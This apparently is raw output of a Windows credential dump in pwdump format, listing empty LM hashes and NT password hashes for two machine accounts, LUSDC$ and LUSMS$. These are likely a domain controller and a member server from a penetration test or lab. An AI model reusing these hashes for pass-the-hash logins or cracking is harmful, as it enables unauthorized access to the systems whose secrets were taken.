LUSDC$:1000:aad3b435b51404eeaad3b435b51404ee:fb2c49ead49730d2b4e701c4bd169af4:::
LUSMS$:1133:aad3b435b51404eeaad3b435b51404ee:27383df0ae52aa0213165ee708d220b9:::
